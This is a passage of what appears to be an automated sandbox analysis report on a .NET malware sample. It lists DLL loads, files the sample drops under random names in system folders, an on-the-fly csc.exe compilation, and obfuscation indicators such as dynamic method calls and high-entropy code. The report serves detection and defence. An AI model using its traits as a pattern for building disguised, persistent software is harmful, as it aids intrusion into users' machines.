                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: ktmw32.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: propsys.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: edputil.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: urlmon.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: iertutil.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: srvcli.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: netutils.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: wintypes.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: appresolver.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: bcp47langs.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: slc.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: userenv.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: sppc.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: mpr.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: pcacli.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: sfc_os.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: version.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: ktmw32.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: amsi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: userenv.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: iphlpapi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: dnsapi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: winnsi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: rasapi32.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: rasman.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: rtutils.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: mswsock.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: winhttp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: rasadhlp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: fwpuclnt.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: winmm.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: winmmbase.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: mmdevapi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: devobj.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: ksuser.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: avrt.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: audioses.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: powrprof.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: umpdc.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: msacm32.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: midimap.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: dwrite.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: edputil.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: windowscodecs.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: ntmarta.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: dpapi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: secur32.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: schannel.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: mskeyprotect.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: ntasn1.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: ncrypt.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: ncryptsslp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: msasn1.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: apphelp.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: version.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: version.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDirectory created: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDirectory created: C:\Program Files\Windows Sidebar\5a424686c5d9eaJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDirectory created: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDirectory created: C:\Program Files\Windows Portable Devices\7252974aa180daJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDirectory created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDirectory created: C:\Program Files\Microsoft\b730a2198d720aJump to behavior
                              Source: VQdUvAQ4xO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: VQdUvAQ4xO.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: VQdUvAQ4xO.exeStatic file information: File size 2005504 > 1048576
                              Source: VQdUvAQ4xO.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1e9200
                              Source: VQdUvAQ4xO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.pdb source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.00000000031CB000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: VQdUvAQ4xO.exe, ovx7777NkOk92DBATbY.cs.Net Code: Type.GetTypeFromHandle(ciXfN6tqmX8b1O3iOug.TicScUf9WCb(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ciXfN6tqmX8b1O3iOug.TicScUf9WCb(16777245)),Type.GetTypeFromHandle(ciXfN6tqmX8b1O3iOug.TicScUf9WCb(16777259))})
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline"
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeCode function: 0_2_00007FFD9B7047DB push es; iretd 0_2_00007FFD9B7047E1
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeCode function: 0_2_00007FFD9B70478C push ebp; iretd 0_2_00007FFD9B704792
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeCode function: 0_2_00007FFD9B7055C6 push ebp; iretd 0_2_00007FFD9B7055D8
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeCode function: 0_2_00007FFD9BB01D5E push ebx; ret 0_2_00007FFD9BB01D5F
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeCode function: 0_2_00007FFD9BB024E1 push ds; ret 0_2_00007FFD9BB024EE
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeCode function: 20_2_00007FFD9B6F47DB push es; iretd 20_2_00007FFD9B6F47E1
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeCode function: 20_2_00007FFD9B6F478C push ebp; iretd 20_2_00007FFD9B6F4792
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeCode function: 20_2_00007FFD9B6F55C6 push ebp; iretd 20_2_00007FFD9B6F55D8
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 30_2_00007FFD9B7354B1 pushfd ; iretd 30_2_00007FFD9B7354F1
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 30_2_00007FFD9B747510 push ebx; iretd 30_2_00007FFD9B74756A
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 30_2_00007FFD9B747528 push ebx; iretd 30_2_00007FFD9B74756A
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 30_2_00007FFD9B71478C push ebp; iretd 30_2_00007FFD9B714792
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 30_2_00007FFD9B7147DB push es; iretd 30_2_00007FFD9B7147E1
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 30_2_00007FFD9B7155C6 push ebp; iretd 30_2_00007FFD9B7155D8
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 30_2_00007FFD9B728C52 pushfd ; iretd 30_2_00007FFD9B728C53
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 30_2_00007FFD9B721A66 push ecx; iretd 30_2_00007FFD9B721A6C
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 32_2_00007FFD9B71478C push ebp; iretd 32_2_00007FFD9B714792
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 32_2_00007FFD9B7147DB push es; iretd 32_2_00007FFD9B7147E1
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeCode function: 32_2_00007FFD9B7155C6 push ebp; iretd 32_2_00007FFD9B7155D8
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B708C52 pushfd ; iretd 33_2_00007FFD9B708C53
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B701A66 push ecx; iretd 33_2_00007FFD9B701A6C
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B6F47DB push es; iretd 33_2_00007FFD9B6F47E1
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B6F478C push ebp; iretd 33_2_00007FFD9B6F4792
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B6F55C6 push ebp; iretd 33_2_00007FFD9B6F55D8
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B727580 push ebx; iretd 33_2_00007FFD9B72756A
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B727510 push ebx; iretd 33_2_00007FFD9B72756A
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B727528 push ebx; iretd 33_2_00007FFD9B72756A
                              Source: C:\Recovery\0eDO5Zbs.exeCode function: 33_2_00007FFD9B7154B1 pushfd ; iretd 33_2_00007FFD9B7154F1
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeCode function: 34_2_00007FFD9B6E47DB push es; iretd 34_2_00007FFD9B6E47E1
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeCode function: 34_2_00007FFD9B6E478C push ebp; iretd 34_2_00007FFD9B6E4792
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeCode function: 34_2_00007FFD9B6E55C6 push ebp; iretd 34_2_00007FFD9B6E55D8
                              Source: VQdUvAQ4xO.exeStatic PE information: section name: .text entropy: 7.570960606064103
                              Source: mENvqiIeFx.exe.0.drStatic PE information: section name: .text entropy: 7.570960606064103
                              Source: 0eDO5Zbs.exe.0.drStatic PE information: section name: .text entropy: 7.570960606064103
                              Source: r6Lr6XbTWt.exe.0.drStatic PE information: section name: .text entropy: 7.570960606064103
                              Source: JOajDppbSkfqSPK1G9zAbH.exe.0.drStatic PE information: section name: .text entropy: 7.570960606064103
                              Source: VQdUvAQ4xO.exe, Aj7hYqFSqj69oOYBolh.csHigh entropy of concatenated method names: 'BQTFwRsQQ7', 'JI9FchMbWK', 'NduF3Rw53F', 'K77FAtWOWk', 'L35FYptfwa', 'KNUFFenqCT', 'dHAF1lWwFx', 'D4KFyLxDLO', 'YY5F8CIg8F', 'VQmFIjiPsV'
                              Source: VQdUvAQ4xO.exe, qIbqruFqaSOJk8LRZM8.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'lhGlicHkCGOrFqbpbcnY', 'NB02m9Hk2rsirkExQeoQ', 'jWjFGuHkbg3AsJNs79RK', 'MwlOMaHkn6m7n7gBEgMs'
                              Source: VQdUvAQ4xO.exe, RcOytGY90HmlQRYkluS.csHigh entropy of concatenated method names: 'f8pYuwweL8', 'pXPFUAHk3eNDDo4lWs40', 'gK12sYHkwHhy9H2UITjA', 'vAyuelHkcDiyagBMYdt9', 'akLMFhHkA6T35x2RYpQA', 'viswvHHkYxFCR1OwEpWA', 'P9X', 'vmethod_0', 'iK8HwhnCrjx', 'imethod_0'
                              Source: VQdUvAQ4xO.exe, qDH1wJLFHoxO5yjGxpG.csHigh entropy of concatenated method names: 'C3yLExDw4l', 'roj0KkHdehG2qMesLnc9', 'j5mUXxHdiVfCfbBCqj2h', 'nstfSNHdaQuw3b8RhcLJ', 'pXDAcfHdoIlSL7EkpU53', 'YVvFyyHddVF1789CZ0TR', 'IPy', 'method_0', 'method_1', 'method_2'
                              Source: VQdUvAQ4xO.exe, RDllJ1RykikWrbtXH0e.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'T2EHY6k9q1M', 'HQkHYsdwgON', 'OZO4cNHfgKkO9EUuwYHq', 'jxtecGHfLH3hQdKni6o3', 'ShiCLBHfMyEu3tVrKXb5', 'xSAUBGHfrwFPRRjO3GQI', 'D6wxofHffVZNx8p9nESY', 'm8foyPHfm38T7VGO1kJc'
                              Source: VQdUvAQ4xO.exe, QkGBm9VdXdrhFcmMBNf.csHigh entropy of concatenated method names: 'wGcVGfmlEg', 'HLeVuqJv2E', 'hIVV7qUWUD', 'oBVVPkcd9Z', 'qclVtbhuyF', 'QMapV4HKVMxFgkuRGkPO', 'MlyZXiHK0siH0y5q1XNu', 'HSaMMjHKhbxfj6jLiFi7', 'LcCPaKHKp0eVMLhG7vdT', 'yN9axXHKJgL8yIweBSep'
                              Source: VQdUvAQ4xO.exe, MdPAjiUoC9pBAJgfdG4.csHigh entropy of concatenated method names: 'o7vHYjKOFYp', 'c1hUiZO7d5', 'EKZHYNAjZUe', 'APHhg0Hf1eOJ9XmHq2I5', 'UDJ4COHfyoBf0oxXxMd4', 'aXnkGVHfYstoBq1l6Ebl', 'sck7S4HfFvJaZEKtgHSe', 'XQhCkmHf8qKIvmAl42Oy', 'NlAWXIHfI3cVKJaigr7F'
                              Source: VQdUvAQ4xO.exe, NuPqB04iNtErnWZsMuX.csHigh entropy of concatenated method names: 'tdp4QiFdWv', 'QLo4GGAING', 'Moi4uNJxtF', 'inH47J00gh', 'Qke4P8i1VB', 'xx1gUcHXOrAGSMXByhp7', 'yAF6xXHXnwY0wAEgn2KN', 'QXD55WHXkDqOjoHB2jVt', 'cIuSGBHXgRYpQtWdcbsn', 'KlekhNHXLXddPTqAA6pd'
                              Source: VQdUvAQ4xO.exe, ovx7777NkOk92DBATbY.csHigh entropy of concatenated method names: 'ybNqO0HPKRC1b0WqW3Ig', 'KMlUtNHPaJwogE0b16yW', 'uQIPQGAHY3', 'B8u56YHPdbLr2UEFqskd', 'jLSwxvHPQqQj7TXB4kU9', 'RVFgu1HPGvylnFDykVKU', 'iNuIe2HPuEMbYt99L74y', 'KXY4PEHP7PWWPdnbe5lr', 'Mx441xHPPrk9tuUOqw9s', 'nYLbZDHPt0yYbH14lbn5'
